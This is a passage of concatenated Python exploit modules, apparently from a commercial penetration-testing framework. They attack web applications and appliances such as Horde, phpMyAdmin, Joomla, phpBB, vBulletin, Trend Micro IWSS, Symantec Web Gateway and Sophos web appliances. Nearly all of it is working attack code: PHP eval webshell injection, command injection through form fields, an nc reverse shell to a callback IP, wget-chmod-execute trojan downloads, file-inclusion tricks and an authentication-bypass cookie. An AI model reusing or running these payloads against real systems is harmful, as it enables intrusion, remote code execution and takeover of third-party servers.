) + "%26cmd%20/c%20echo%20\"%3c%3f%70%68%70%20%65%76%61%6c%28%62%61%73%65%36%34%5f%64%65%63%6f%64%65%28%24%5f%47%45%54%5b%63%5d%29%29%3b%20%3f%3e\">%20" + eval_file + "&dir"
UA.SetCookie("olist", eval_code)
data = UA.POST("property_box.php",
"type=Dataset&objectname[]=%s" % (wp_randomstring(1)),
extraheaders=None,
noresponse=True)
UA.ClearCookies()
time.sleep(2)
if self.command:
command = "system(\"" + self.command + "\");"
self.log("WP> Sending Exploit Stage 2 - Executing Command: %s" %
self.command)
data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()),
noresponse=False)
self.log(data)
time.sleep(2)
command = "system(\"del /Q /F " + eval_file + "\");"
data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()),
noresponse=False)
ret = 1
else:
command = self.get_php_to_mosdef().strip()
self.log("WP> Sending Exploit Stage 2: Payload\n")
data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()),
noresponse=True)
time.sleep(2)
command = "system(\"del /Q /F " + eval_file + "\");"
data = UA.GET("%s?c=%s" % (eval_file, b64encode(command).strip()),
noresponse=False)
for i in xrange(0, 3):
time.sleep(1)
ret = self.ISucceeded()
if ret:
break
if not ret:
self.log("WP> Did not succeed in getting a connectback")
if ret:
self.setInfo("WP> %s attacking %s:%d - completed (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return ret
def upload_file(self):
# Open JSP file
f = open(self.filename, "r")
fdata = f.read()
f.close()
fdata = fdata.replace("CALLBACK_IP", self.callback.ip)
fdata = fdata.replace("CALLBACK_PORT", str(self.callback.port))
ua = spkproxy.UserAgent("", exploit=self)
# Authentication
url = '/'
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
url = '/j_security_check'
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'AUTHRULE_NAME': 'Authenticator',
'clienttype': 'html',
'ScreenWidth': '1920',
'ScreenHeight': '932',
'loginFromCookieData': '',
'ntlmv2': 'false',
'j_username': self.username,
'j_password': self.password,
'signInAutomatically': 'on',
'uname': ''
})
data = ua.POST(mainurl, params)
# Get apiKey
url = '/'
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
url = '/apiclient/ember/index.jsp'
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
m = re.search('window.OPM.apiKey = "([^\"]+)";', data)
if m is None:
self.log("[D2SEC] - apiKey not found")
return 0
# Upload JSP file
params = '-----------------880735062871553\r\nContent-Disposition: form-data; name="post"\r\n\r\nd2\r\n-----------------880735062871553\r\nContent-Disposition: form-data; name="[object HTMLInputElement]i"; filename="d2.jsp"\r\nContent-Type: text/plain\r\nContent-Length: %d\r\n\r\n%s\r\n-----------------880735062871553--\r\n' % (
len(fdata), fdata)
url = '/api/json/dashboard/addPost?apiKey=%s&groupID=0' % m.group(1)
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
ua.addHeader(
"Content-Type",
"multipart/form-data; boundary=---------------880735062871553")
data = ua.POST(mainurl, params)
m = re.search('"post_id":"([^\"]+)"', data)
if m is None:
self.log("[D2SEC] - post_id not found")
return 0
# Execute uploaded JSP file
url = "/itplus/FileStorage/%s/d2.jsp" % m.group(1)
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
return 1
def run(self):
self.getArgs()
useragentstring = "http://" + self.host + ":%s" % self.port + "/"
UA = spkproxy.UserAgent(useragentstring,
auth=None,
hostname=self.host,
exploit=self)
ret = 0
if self.command:
self.log("WP> Executing Command: %s" % self.command)
self.log("WP> Sending Exploit")
UA.SetCookie("href", "system:" + self.command)
data = UA.POST("%s/services/javascript.php" % self.hordepath,
"app=%s&file=open_calendar.js" % (self.hordeapp),
extraheaders=None,
noresponse=False)
lhref = 'link.href = \'#'
for i in range(len(data)):
if lhref in data[i:i + len(lhref)]:
if not '\';' in data[i + len(lhref):i + len(lhref) + 2]:
result = data[i + len(lhref):data.
find('\n\';', (i + len(lhref)))]
ret = 1
self.log("WP> Command Result:\n%s\r\n " %
prettyprint(result))
time.sleep(2)
if ret:
self.setInfo("WP> %s attacking %s:%d - completed (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return ret
else:
lsock = self.gettcplistener(self.rcv_port, self.callback.ip)
if lsock == 0:
self.log("WP> Unable to list on port %d" % self.rcv_port)
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
self.log("WP> Listening on port %d" % self.rcv_port)
self.log("WP> Sending Exploit")
# nc -n ip port -e /bin/sh \&\n
UA.SetCookie(
"href",
"system:nc -n " + self.callback.ip + " " + str(self.rcv_port) +
"%20%2d%65%20%2f%62%69%6e%2f%73%68%20%5c%26%5c%6e")
data = UA.POST("%s/services/javascript.php" % self.hordepath,
"app=%s&file=open_calendar.js" % (self.hordeapp),
extraheaders=None,
noresponse=True)
self.log("WP> Awaiting connectback")
lsock.set_timeout(30)
try:
(s2, addr) = lsock.accept()
s2.set_timeout(2)
except:
self.log("WP> Connectback failed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
telnetshell = Telnet()
telnetshell.sock = s2
try:
shell = shelllistener(shellfromtelnet(telnetshell),
logfunction=self.logfunction,
simpleShell=1)
except:
self.log("WP> Shell listener failed - connection closed")
self.setInfo("WP> %s attacking %s:%d - completed (failed!)" %
(NAME, self.host, self.port))
return 0
node = unixShellNode()
node.parentnode = self.argsDict["passednodes"][0]
node.shell = shell
self.setInfo("WP> %s attacking %s:%d - completed" %
(NAME, self.host, self.port))
return node
def run(self):
# Check arguments
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.username = self.argsDict.get("username", self.username)
self.password = self.argsDict.get("password", self.password)
self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
thread.start_new_thread(self.startHTTPServer, ())
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
ua = spkproxy.UserAgent("", exploit=self)
# Authentication
url = '/logon.jsp'
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
url = '/uilogonsubmit.jsp'
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'wherefrom': '',
'wronglogon': 'no',
'pwd': 'Log On',
'uid': self.username,
'passwd': self.password
})
data = ua.POST(mainurl, params)
# Get CSRFGuardToken
url = '/top.jsp'
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl, entireresponse=True)
m = re.search(b'CSRFGuardToken=([^\"]+)', data)
if m is None:
self.log("[D2SEC] - Token not found")
return 0
token = m.group(1)
self.log("[D2SEC] - CSRFGuardToken=%s" % token)
# Exploitation
"""
url = "/servlet/com.trend.iwss.gui.servlet.ManageSRouteSettings?action=add"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({'CSRFGuardToken':token, 'op':'sroutemanage', 'fromurl':'/staticRoutes.jsp', 'failoverurl':'/staticRoutes.jsp', 'port':'', 'oldnetid':'', 'oldrouter':'', 'oldnetmask':'', 'oldport':'', 'netid':'192.168.1.0', 'netmask':'255.255.255.0', 'router':'192.168.1.1', 'interface_vlanid_sel':'eth1`%s`'%self.cmd})
buff = ua.POST(mainurl, params)
"""
url = "/SSHConfig.jsp"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'CSRFGuardToken': token,
'needSSHConfigure': 'yes',
'SSHStatus': 'enable',
'SSHPort': '`%s`' % self.cmd,
'op': 'save',
'cbSSHStatus': 'enable',
'btSSHPort': '221'
})
buff = ua.POST(mainurl, params)
while 1:
time.sleep(1)
return 1
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
if self.version == 0:
ret = self.test()
if not ret:
self.log("Testing didn't find vulnerable target")
return 0
self.log("Attacking %s:%d" % (self.host, self.port))
self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
UA = spkproxy.UserAgent(protocol + "://" + self.host + "/" +
self.basepath,
auth=auth,
hostname=self.hostname,
exploit=self)
self.log("Getting index.php to grab our cookie")
data = UA.GET("index.php")
self.log("Data=%s" % data)
if self.command:
self.log("Command: %s" % self.command)
phpsessid = UA.cookies.get("PHPSESSID")
if not phpsessid:
self.log("Failed to see a php session id!")
self.log("Cookies=%s" % repr(UA.cookies))
return 0
command = self.command
self.log("Sending Exploit Reply")
fields = {}
fields[
"langChoice"] = "<? print(\"startz\");passthru(stripslashes(\"" + command + "\"));print(\"endz\");?>\00"
data = UA.POST("index.php", fields)
expl = UA.POST(
"index.php",
"langChoice=../../../../../../../../../../../../../../tmp/sess_"
+ phpsessid + "\00")
#self.log("Data=%s"%data)
if "startz" in data:
result = data.split("startz")[1].split("endz")[0]
#self.log("Command data: %s"%prettyprint(data))
self.log("Command result=%s" % prettyprint(result))
ret = 1
else:
self.log("Command not run - service patched?!")
else:
command = "<?" + self.get_php_to_mosdef().strip() + "?>\00"
phpsessid = UA.cookies.get("PHPSESSID")
if not phpsessid:
self.log("Failed to see a php session id!")
self.log("Cookies=%s" % repr(UA.cookies))
return 0
#command=command.replace("/","`pwd|cut -b1`")
self.log("Command: %s" % command)
self.log("Sending Exploit Reply")
fields = {}
fields["langChoice"] = command
data = UA.POST("index.php", fields)
expl = UA.POST(
"index.php",
"langChoice=../../../../../../../../../../../../../../tmp/sess_"
+ phpsessid + "\00")
self.log("Data=%s" % data)
self.log("Looking for PHP connectback")
ret = self.ISucceeded()
if ret:
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return ret
def run(self):
self.getargs()
#test = self.test()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.hostname, self.port))
self.log("Attacking %s:%d" % (self.hostname, self.port))
#self.log("Basic Auth User: %s"%self.basicauth_user)
self.log("VHost: %s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user != "":
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath
self.log("useragentstring: %s" % useragentstring)
UA = spkproxy.UserAgent(useragentstring,
auth=auth,
hostname=self.hostname,
exploit=self)
response = UA.GET(self.setupfile)
#<input type="hidden" name="token" value="aa96b8c97b4908d5cddcdcdddc83d211" />
response = response.split(" ")
try:
tokenpos = response.index("name=\"token\"")
token = response[tokenpos + 1].strip("\"").strip("value=\"")
self.log("Found valid token to use: %s" % token)
except ValueError:
self.log("No usable token found. Will not proceed with attack")
return 0
#manually encoded this stuff because urllib.quote_plus was having a bad day ...
command = """:%22host%27%5d=%27%27%3b%20if($_GET%5b%27s%27%5d){eval(base64_decode($_GET%5b%27s%27%5d))%3b}%3b"""
commandlen = len(urllib.unquote(command))
poststuff = """token=%s&action=save&configuration=a:1:{s:7:%%22Servers%%22%%3ba:1:{i:0%%3ba:6:{s:%s%s//%%22%%3bs:9:%%22localhost%%22%%3bs:9:%%22extension%%22%%3bs:6:%%22mysqli%%22%%3bs:12:%%22connect_type%%22%%3bs:3:%%22tcp%%22%%3bs:8:%%22compress%%22%%3bb:0%%3bs:9:%%22auth_type%%22%%3bs:6:%%22config%%22%%3bs:4:%%22user%%22%%3bs:4:%%22root%%22%%3b}}}&eoltype=unix""" % (
token, commandlen, command)
#push the eval() code into the config.inc.php file
response = UA.POST(self.setupfile, poststuff, noresponse=False)
#get a shell!
response = UA.GET(
self.configfile +
"?s=%s" % b64encode(self.get_php_to_mosdef()).strip(),
noresponse=True)
for i in xrange(0, 3): #wait three seconds for callback
time.sleep(1)
ret = self.ISucceeded()
if ret:
break
if ret:
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return ret
def run(self):
# Check arguments
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.username = self.argsDict.get("username", self.username)
self.password = self.argsDict.get("password", self.password)
if (self.argsDict.get("cmd", self.cmd) == ""):
self.TROJANMODE = 1
self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
thread.start_new_thread(self.startHTTPServer, ())
else:
self.cmd = self.argsDict.get("cmd", self.cmd)
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
ua = spkproxy.UserAgent("", exploit=self)
# Authentication
url = "/spywall/login.php"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'loginBtn': 'Login',
'target': '/spywall/executive_summary.php',
'section': '',
'USERNAME': self.username,
'PASSWORD': self.password
})
data = ua.POST(mainurl, params)
if "login.php" in data:
self.log('[D2SEC] Authentication error')
return 0
# Exploitation
self.cmd = 'd2`%s > cleaner/d2`' % self.cmd
url = "/spywall/new_whitelist.php"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'applianceid': '1',
'sid': '1',
'oldUrl': '',
'isNew': '1',
'white_ip': self.cmd,
'whitelist': '1',
'ignore_auth': '0',
'white_comment': ''
})
data = ua.POST(mainurl, params)
url = "/spywall/cleaner/d2"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
if '404 Not Found' in data:
self.log('[D2SEC] No valid session id found')
return 0
if (self.TROJANMODE == 1):
while 1:
time.sleep(1)
else:
self.log('[D2SEC] %s' % data)
return 1
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port))
self.log("Using version: %s"%self.version)
if self.version==0:
ret=self.test()
if not ret:
self.setInfo("%s against %s:%d (failed: didn't find vulnerable target!)"%(NAME,self.host,self.port))
self.log("Testing didn't find vulnerable target")
return 0
self.log("Attacking %s:%d"%(self.host,self.port))
self.log("Basic Auth User: %s"%self.basicauth_user)
self.log("VHost: %s"%self.hostname)
if self.ssl:
protocol="https"
else:
protocol="http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
else:
auth=None
useragentstring=protocol+"://"+self.host+":%s"%self.port+"/"+self.basepath
self.log("useragentstring: %s"%useragentstring)
UA=spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self)
if self.command:
self.log("Command: %s"%self.command)
command=self.command
command="print '---1243---\n';passthru(\'"+command+"');print '---3421---\n'; ".strip()
data = UA.GET("index.php?c=%s&searchword=%%22;eval($_GET[c]);%%23&option=com_search&Itemid=1"%(urllib.quote_plus(command)))
if "---1243---" in data:
result=data.split("1243---")[1].split("---3421")[0]
self.log("Command data: %s"%prettyprint(data))
self.log("Command result=%s"%prettyprint(result))
ret=1
else:
self.log("Command not run - service patched?!")
else:
command=self.get_php_to_mosdef().strip()
#command=command.replace("/","`pwd|cut -b1`")
self.log("PHP Callback Command: %s"%command)
#we escape it with a " and then have a # to end it as a comment
#A result of "Invalid argument supplied for foreach()" is normal when it works.
#data = UA.GET("index.php?c=%s&searchword=%%22;eval(base64_decode($_GET[c]));%%23&option=com_search&Itemid=1"%(b64encode(command)))
data = UA.GET("index.php?d=%s&c=eval(base64_decode($_GET[d]));&searchword=%%22;eval($_GET[c]);%%23&option=com_search&Itemid=1"%(b64encode(command).strip()),noresponse=True)
self.log("Looking for PHP connectback")
for i in xrange(0,3): #wait three seconds for callback
time.sleep(1)
ret=self.ISucceeded()
if ret:
break
if not ret:
self.log("Did not succeed in getting a callback")
#if data.count("Parse error"):
# self.log("Some sort of parse error in our shellcode :<")
#file("fail.html","w").write(data)
if ret:
self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port))
return ret
def run(self):
for node in self.argsDict['passednodes']:
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log_info("Using version: %s" % self.version)
ret = self.check()
self.setProgress(30)
if not ret:
self.setInfo(
"%s against %s:%d (failed: didn't find vulnerable target!)"
% (NAME, self.host, self.port))
self.log_info("Testing didn't find vulnerable target")
return 0
self.log_info("Attacking %s:%d" % (self.host, self.port))
#self.log("Basic Auth User: %s"%self.basicauth_user)
#self.log("VHost: %s"%self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
requestString = protocol + "://" + self.host + ":%s" % self.port + self.basepath
self.log("RequestString: %s" % requestString)
UA = spkproxy.UserAgent(requestString,
auth=auth,
hostname=self.hostname,
exploit=self)
UA.SetCookie(
self.magicCookie_name,
self.magicCookie_val) # to clear the authentigation flag.
self.log("Cookie: " + self.magicCookie_name + "=" +
self.magicCookie_val)
self.setProgress(50)
# To-do: Handle enable/disable separatedly
#
#UA.SetCookie(self.magicCookie_name,self.magicCookie_val+1) # to restore authentication flag.
#self.log("Cookie: "+self.magicCookie_name+"="+self.magicCookie_val)
data = UA.GET("")
self.setProgress(70)
if "status/status_deviceinfo" in data:
self.log("Authentication successfully disabled!")
self.log("You can now access web interface without password.")
self.setProgress(100)
ret = 1
else:
if "Protected Object" in data:
self.log("Exploit did not work. Wrong offsets?")
ret = 0
if ret:
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return ret
def run(self):
# Check arguments
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.username = self.argsDict.get("username", self.username)
self.password = self.argsDict.get("password", self.password)
if (self.argsDict.get("cmd", self.cmd) == ""):
self.TROJANMODE = 1
self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
thread.start_new_thread(self.startHTTPServer, ())
else:
self.cmd = self.argsDict.get("cmd", self.cmd)
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
ua = spkproxy.UserAgent("", exploit=self)
# Authentication
url = "/"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
m = re.findall('name="STYLE" value="([^"]+)" ', data)
if m is None:
self.log('[D2SEC] Unable to get a valid session id')
return 0
style = m[len(m) - 1]
self.log("STYLE=%s" % style)
url = "/index.php?c=login"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'STYLE': style,
'destination': '',
'section': '',
'username': self.username,
'password': self.password
})
data = ua.POST(mainurl, params)
if "Invalid username" in data:
self.log('[D2SEC] Authentication error')
return 0
# Exploitation
self.cmd = 'user_timeline`%s > backup/d2`' % self.cmd
url = "/index.php?c=logs"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'STYLE': style,
'period': 'today',
'xperiod': '',
'sb_xperiod': 'xdays',
'startDate': '',
'txt_time_start': '12:00 AM',
'endDate': '',
'txt_time_end': '11:59 PM',
'txt_filter_user_timeline': '',
'action': 'search',
'by': self.cmd,
'search': '',
'sort': 'time',
'multiplier': '1',
'start': '',
'end': '',
'direction': '1',
'_': ''
})
data = ua.POST(mainurl, params)
url = "/backup/d2"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
if '404 - File not found' in data:
self.log('[D2SEC] No valid session id found')
return 0
if (self.TROJANMODE == 1):
while 1:
time.sleep(1)
else:
self.log('[D2SEC] %s' % data)
return 1
def run(self):
# Check arguments
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.username = self.argsDict.get("username", self.username)
self.password = self.argsDict.get("password", self.password)
if (self.argsDict.get("cmd", self.cmd) == ""):
self.TROJANMODE = 1
self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
thread.start_new_thread(self.startHTTPServer, ())
else:
self.cmd = self.argsDict.get("cmd", self.cmd)
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
ua = spkproxy.UserAgent("", exploit=self)
ua.addHeader(
"User-Agent",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
)
# Authentication
url = "/"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
m = re.findall('name="STYLE" value="([^"]+)" ', data)
if m is None:
self.log('[D2SEC] Unable to get a valid session id')
return 0
style = m[len(m) - 1]
url = "/index.php?c=login"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'STYLE': style,
'destination': '',
'section': '',
'username': self.username,
'password': self.password
})
data = ua.POST(mainurl, params)
if "Invalid username" in data:
self.log('[D2SEC] Authentication error')
return 0
# Exploitation
self.cmd = '1.1.1.1_1.1.1.2`%s > backup/d2`' % self.cmd
url = "/index.php?c=users_monitored_search_queries§ion=reports&STYLE=%s&unblockip=%s" % (
style, urllib.quote(self.cmd))
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
url = "/backup/d2"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
if '404 - File not found' in data:
self.log('[D2SEC] No valid session id found')
return 0
if (self.TROJANMODE == 1):
while 1:
time.sleep(1)
else:
self.log('[D2SEC] %s' % data)
return 1
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" % (self.name, self.host, self.port))
self.log("Using version: %s" % self.version)
#
# If we don't get a basepath argument we try to figure it out through
# self.basepaths
#
if not self.basepath:
ret = self.test()
if not ret:
self.setInfo("%s against %s:%d (failed: didn't find vulnerable target!)" % (self.name, self.host, self.port))
self.log("Testing didn't find vulnerable target")
return 0
if not self.hostname:
self.hostname = self.host
self.log("Attacking %s:%d" % (self.host, self.port))
self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
#setup our UA first
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
else:
auth = None
targetstring = protocol + "://" + self.hostname + ":" + str(self.port) + self.basepath
self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self)
if hasattr(self, "content_type"):
self.ua.addHeader("Content-Type", self.content_type)
# Testing may need to change if it mucks with anything..
self.ua.addHeader("User-Agent", self.random_ua())
noresponse = True
if self.command:
#we do get the response if we are sending it a command
noresponse = False
data = self.ua.GET(self.targetpath + "?" + self.geturlarguments(), noresponse=noresponse)
if self.command and data:
blah = self.parse_command_response(data)
sleep(1)
#
# Time to trigger our php callback
#
cback = self.get_php_to_mosdef()
cback = b64encode(cback).strip()
t = "z.php?c=%s" % cback
data = self.ua.GET(t, noresponse=noresponse)
#
# Wait 5 seconds for callback
#
for i in range(0, 5):
ret = self.ISucceeded()
if ret:
break
sleep(1)
#
# Cleanup
#
logging.warning("Performing cleanup")
command = """unlink('./z.php');"""
serialized_arg = """arguments=O:12:"vB_dB_Result":2:{s:5:"*db";O:17:"vB_Database_MySQL":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"assert";}}s:12:"*recordset";s:%d:"%s";}""" % (len(command), command)
arg = quote(serialized_arg, safe="=").replace("%2A", "%00%2A%00")
data = self.ua.GET(self.targetpath + "?" + arg)
logging.warning("Cleanup DONE")
self.setInfo("%s attacking %s:%d (DONE)" % (self.name, self.host, self.port))
self.setProgress(100)
return ret
def run(self):
# Check arguments
self.host = self.target.interface
self.port = int(self.argsDict.get("port", self.port))
self.username = self.argsDict.get("username", self.username)
self.password = self.argsDict.get("password", self.password)
if (self.argsDict.get("cmd", self.cmd) == ""):
self.TROJANMODE = 1
self.cmd = "wget -O /tmp/" + self.trojanname + " http://" + self.callback.ip + "/" + self.trojanname + "; chmod +x /tmp/" + self.trojanname + "; /tmp/" + self.trojanname
thread.start_new_thread(self.startHTTPServer, ())
else:
self.cmd = self.argsDict.get("cmd", self.cmd)
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
self.log("Attacking %s:%d" % (self.host, self.port))
ua = spkproxy.UserAgent("", exploit=self)
ua.addHeader(
"User-Agent",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
)
# Authentication
url = "/"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
m = re.findall('name="STYLE" value="([^"]+)" ', data)
if m is None:
self.log('[D2SEC] Unable to get a valid session id')
return 0
style = m[len(m) - 1]
url = "/index.php?c=login"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'STYLE': style,
'destination': '',
'section': '',
'username': self.username,
'password': self.password
})
data = ua.POST(mainurl, params)
if "Invalid username" in data:
self.log('[D2SEC] Authentication error')
return 0
# Exploitation
self.cmd = '0.3156784180233425`%s > backup/d2`' % self.cmd
url = "/index.php?c=report&name=traf_users"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
params = urllib.urlencode({
'STYLE': style,
'chart': 'pie',
'period': 'custom',
'multiplier': '1',
'metric': '',
'token': self.cmd,
'start': '07/28/2017',
'end': '07/28/2017',
'filters':
'{"topn": "25", "department": "sophos_swa_all_departments"}',
'pdf': '1'
})
data = ua.POST(mainurl, params)
url = "/backup/d2"
mainurl = "%s://%s:%d%s" % (self.protocol, self.host, self.port, url)
data = ua.GET(mainurl)
if '404 - File not found' in data:
self.log('[D2SEC] No valid session id found')
return 0
if (self.TROJANMODE == 1):
while 1:
time.sleep(1)
else:
self.log('[D2SEC] %s' % data)
return 1
def run(self):
self.getargs()
self.setInfo("%s attacking %s:%d (in progress)" %
(NAME, self.host, self.port))
if self.version == 0:
ret = self.test()
if not ret:
self.log("Testing didn't find vulnerable target")
return 0
self.log("Attacking %s:%d" % (self.host, self.port))
self.log("Basic Auth User: %s" % self.basicauth_user)
self.log("VHost: %s" % self.hostname)
if self.ssl:
protocol = "https"
else:
protocol = "http"
#If we have to do basic-auth, let's get an object from spkproxy here
if self.basicauth_user:
auth = spkproxy.BasicAuth(self.basicauth_user,
self.basicauth_password)
else:
auth = None
UA = spkproxy.UserAgent(protocol + "://" + self.host +
":%s" % self.port + "/" + self.basepath,
auth=auth,
hostname=self.hostname,
exploit=self)
if self.command:
self.log("Command: %s" % self.command)
command = self.command
command = "print '---1243---\n';passthru(\'" + command + "');print '---3421---\n'; ".strip(
)
data = UA.GET(
"viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527"
% (urllib.quote_plus(command)))
if "---1243---" in data:
result = data.split("1243---")[1].split("---3421")[0]
self.log("Command data: %s" % prettyprint(data))
self.log("Command result=%s" % prettyprint(result))
ret = 1
else:
self.log("Command not run - service patched?!")
else:
command = self.get_php_to_mosdef().strip()
command = command.replace("/", "`pwd|cut -b1`")
self.log("Command: %s" % command)
data = UA.GET(
"viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527"
% (urllib.quote_plus(command)))
self.log("Looking for PHP connectback")
ret = self.ISucceeded()
if ret:
self.setInfo("%s attacking %s:%d - done (success!)" %
(NAME, self.host, self.port))
else:
self.setInfo("%s attacking %s:%d - done (failed)" %
(NAME, self.host, self.port))
return ret
def download(self, widget):
self.SelectedScan = []
column_names = ['Name', 'Date', 'Reference']
gladefile = self.exploitpath + "simple2.glade"
self.wTree2 = gtk.glade.XML(gladefile)
dic = {
"on_start_clicked": self.start,
"on_delreport_toggled": self.activatedel,
"on_deselectall_clicked": self.deselectall,
"on_selectall_clicked": self.selectall
}
self.wTree2.signal_autoconnect(dic)
self.loaddlg = self.wTree2.get_widget("exploit_dialog")
try:
self.loaddlg.set_icon_from_file(self.exploitpath + "d2.ico")
except:
pass
# Init reports treeview
self.treeview_3 = self.wTree2.get_widget("mytree")
self.treestore_3 = gtk.TreeStore(str, str, str)
self.treeview_3.set_show_expanders(False)
self.treeview_3.set_model(self.treestore_3)
self.treeselection = self.treeview_3.get_selection()
self.treeselection.set_mode(gtk.SELECTION_MULTIPLE)
column = [None] * len(column_names)
